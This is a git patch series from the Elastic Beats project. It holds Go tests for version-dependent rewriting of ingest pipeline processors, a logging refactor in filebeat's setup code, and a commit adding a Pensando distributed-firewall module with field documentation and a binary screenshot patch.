*common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 7.9.0", - esVersion: common.MustNewVersion("7.8.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES == 7.9.0", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES > 7.9.0", - esVersion: common.MustNewVersion("8.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "existing if", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ignore_empty_value is false", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": false, - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "no value", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "ignore_empty_value": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - }, - }, - }}, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := modifySetProcessor(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content, test.name) - } - }) - } -} - -func TestModifyAppendProcessor(t *testing.T) { - cases := []struct { - name string - esVersion *common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 7.10.0: set to true", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: set to false", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES == 7.10.0", - esVersion: common.MustNewVersion("7.10.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES > 7.10.0", - esVersion: common.MustNewVersion("8.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: existing if", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - "if": "ctx?.host?.hostname != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: existing if with contains", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: no value", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - }, - }, - }}, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := modifyAppendProcessor(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content, test.name) - } - }) - } -} diff --git a/filebeat/fileset/setup.go b/filebeat/fileset/setup.go index b76cf2719662..c90916fbac9d 100644 --- a/filebeat/fileset/setup.go +++ b/filebeat/fileset/setup.go @@ -21,7 +21,6 @@ import ( "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/cfgfile" "github.com/elastic/beats/v7/libbeat/common" - "github.com/elastic/beats/v7/libbeat/logp" pubpipeline "github.com/elastic/beats/v7/libbeat/publisher/pipeline" ) @@ -69,20 +68,20 @@ type SetupCfgRunner struct { // Start loads module pipelines for configured modules. func (sr *SetupCfgRunner) Start() { - logp.Debug("fileset", "Loading ingest pipelines for modules from modules.d") + sr.moduleRegistry.log.Debug("Loading ingest pipelines for modules from modules.d") pipelineLoader, err := sr.pipelineLoaderFactory() if err != nil { - logp.Err("Error loading pipeline: %+v", err) + sr.moduleRegistry.log.Errorf("Error loading pipeline: %+v", err) return } err = sr.moduleRegistry.LoadPipelines(pipelineLoader, sr.overwritePipelines) if err != nil { - logp.Err("Error loading pipeline: %s", err) + sr.moduleRegistry.log.Errorf("Error loading pipeline: %s", err) } } -// Stopp of SetupCfgRunner. +// Stop of SetupCfgRunner. func (sr *SetupCfgRunner) Stop() {} // String returns information on the Runner From 41944084fa051909673288d4cd0395312000ab77 Mon Sep 17 00:00:00 2001 From: Edward Arcuri <7133080+punisherVX@users.noreply.github.com> Date: Mon, 15 Feb 2021 09:48:00 -0700 Subject: [PATCH 44/63] [Filebeat] Add Pensando DFW Module (#21063) * Add Pensando module init * explicitly define the ECS version per testing * updates to docs from make update * updates for pensando module * updates to documentation and db screenshot * add dashboard export to repo * update to add pensando beat * Update filebeat/module/pensando/dfw/config/dfw.yml Co-authored-by: Marc Guasch * Update pipeline.yml Condensed all "remove" fields to 1 list of fields. * Update pipeline.yml Do not remove the payload_raw field. * Update filebeat/module/pensando/_meta/docs.asciidoc Co-authored-by: Andrew Kroh * Update config.yml Added syslog_host and syslog_port values as suggested. * Update docs.asciidoc Added documentation for syslog_host and syslog_port as suggested. * Update pipeline.yml Removing payload_raw - this and json are, essentially, the same field and no longer needed after parsing. * Update pipeline.yml Changed checks if values are != null to use the filebeat specific ignore_empty_value: true instead. * Remove set of event.module Remove the set param for event.module. Filebeat should add this automatically. * Apply suggestions from code review Co-authored-by: Andrew Kroh * Update test.log * Use convert instead of set for some fields Changed ECS sets for IP addresses and ports to converts of type ip and integer respectively. * Updates for geoip and autonomous system * add pensando dfw fields * fixes from make -C filebeat update * fixes for filebeat check * make update changes * Update filebeat/module/pensando/dfw/config/dfw.yml Co-authored-by: Marc Guasch * Update filebeat/module/pensando/dfw/ingest/pipeline.yml Co-authored-by: Marc Guasch * Update filebeat/module/pensando/dfw/ingest/pipeline.yml Co-authored-by: Marc Guasch * Update filebeat/module/pensando/dfw/ingest/pipeline.yml Co-authored-by: Marc Guasch * Update filebeat/module/pensando/dfw/ingest/pipeline.yml Co-authored-by: Marc Guasch * remove old json file * ran tests * Update filebeat/module/pensando/dfw/ingest/pipeline.yml Co-authored-by: Marc Guasch * gen after run of 'mage -v pythonIntegTest' * Update fields.yml * mage fmt update request Co-authored-by: Marc Guasch Co-authored-by: Andrew Kroh --- CHANGELOG-developer.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 142 ++ .../docs/images/filebeat-pensando-dfw.png | Bin 0 -> 174541 bytes filebeat/docs/modules/pensando.asciidoc | 69 + filebeat/docs/modules_list.asciidoc | 2 + filebeat/filebeat.reference.yml | 12 + filebeat/include/list.go | 1 + filebeat/module/pensando/_meta/config.yml | 10 + filebeat/module/pensando/_meta/docs.asciidoc | 56 + filebeat/module/pensando/_meta/fields.yml | 10 + .../7/dashboard/pensando-dfw-overview.json | 1341 +++++++++++++++++ filebeat/module/pensando/dfw/_meta/fields.yml | 55 + filebeat/module/pensando/dfw/config/dfw.yml | 23 + .../module/pensando/dfw/ingest/pipeline.yml | 218 +++ filebeat/module/pensando/dfw/manifest.yml | 13 + filebeat/module/pensando/dfw/test/test.log | 3 + .../pensando/dfw/test/test.log-expected.json | 134 ++ filebeat/module/pensando/fields.go | 36 + filebeat/module/pensando/module.yml | 1 + filebeat/modules.d/pensando.yml.disabled | 13 + x-pack/filebeat/filebeat.reference.yml | 12 + 21 files changed, 2152 insertions(+) create mode 100755 filebeat/docs/images/filebeat-pensando-dfw.png create mode 100644 filebeat/docs/modules/pensando.asciidoc create mode 100644 filebeat/module/pensando/_meta/config.yml create mode 100644 filebeat/module/pensando/_meta/docs.asciidoc create mode 100644 filebeat/module/pensando/_meta/fields.yml create mode 100644 filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json create mode 100644 filebeat/module/pensando/dfw/_meta/fields.yml create mode 100644 filebeat/module/pensando/dfw/config/dfw.yml create mode 100644 filebeat/module/pensando/dfw/ingest/pipeline.yml create mode 100644 filebeat/module/pensando/dfw/manifest.yml create mode 100644 filebeat/module/pensando/dfw/test/test.log create mode 100644 filebeat/module/pensando/dfw/test/test.log-expected.json create mode 100644 filebeat/module/pensando/fields.go create mode 100644 filebeat/module/pensando/module.yml create mode 100644 filebeat/modules.d/pensando.yml.disabled diff --git a/CHANGELOG-developer.next.asciidoc b/CHANGELOG-developer.next.asciidoc index ba659a3ff31e..2b319225a972 100644 --- a/CHANGELOG-developer.next.asciidoc +++ b/CHANGELOG-developer.next.asciidoc @@ -104,6 +104,7 @@ The list below covers the major changes between 7.0.0-rc2 and master only. - Update Go version to 1.14.7. {pull}20508[20508] - Add packaging for docker image based on UBI minimal 8. {pull}20576[20576] - Make the mage binary used by the build process in the docker container to be statically compiled. {pull}20827[20827] +- Add Pensando distributed firewall module. {pull}21063[21063] - Update ecszap to v0.3.0 for using ECS 1.6.0 in logs {pull}22267[22267] - Add support for customized monitoring API. {pull}22605[22605] - Update Go version to 1.15.7. {pull}22495[22495] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 2a4e439452b4..a8cb2e8d44ad 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -69,6 +69,7 @@ grouped in the following categories: * <> * <> * <> +* <> * <> * <> * <> @@ -105827,6 +105828,147 @@ Specifies the sub type of the log -- +[[exported-fields-pensando]] +== Pensando fields + +pensando Module + + + +[float] +=== pensando + +Fields from Pensando logs. + + + +[float] +=== dfw + +Fields for Pensando DFW + + + +*`pensando.dfw.action`*:: ++ +-- +Action on the flow. + + +type: keyword + +-- + +*`pensando.dfw.app_id`*:: ++ +-- +Application ID + + +type: integer + +-- + +*`pensando.dfw.destination_address`*:: ++ +-- +Address of destination. + + +type: keyword + +-- + +*`pensando.dfw.destination_port`*:: ++ +-- +Port of destination. + + +type: integer + +-- + +*`pensando.dfw.direction`*:: ++ +-- +Direction of the flow + + +type: keyword + +-- + +*`pensando.dfw.protocol`*:: ++ +-- +Protocol of the flow + + +type: keyword + +-- + +*`pensando.dfw.rule_id`*:: ++ +-- +Rule ID that was matched. + + +type: keyword + +-- + +*`pensando.dfw.session_id`*:: ++ +-- +Session ID of the flow + + +type: integer + +-- + +*`pensando.dfw.session_state`*:: ++ +-- +Session state of the flow. + + +type: keyword + +-- + +*`pensando.dfw.source_address`*:: ++ +-- +Source address of the flow. + + +type: keyword + +-- + +*`pensando.dfw.source_port`*:: ++ +-- +Source port of the flow. + + +type: integer + +-- + +*`pensando.dfw.timestamp`*:: ++ +-- +Timestamp of the log. + + +type: date + +-- + [[exported-fields-postgresql]] == PostgreSQL fields diff --git a/filebeat/docs/images/filebeat-pensando-dfw.png b/filebeat/docs/images/filebeat-pensando-dfw.png new file mode 100755 index 0000000000000000000000000000000000000000..da98465eee5e885df9d1c2231f06159be37e3ccf GIT binary patch literal 174541 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 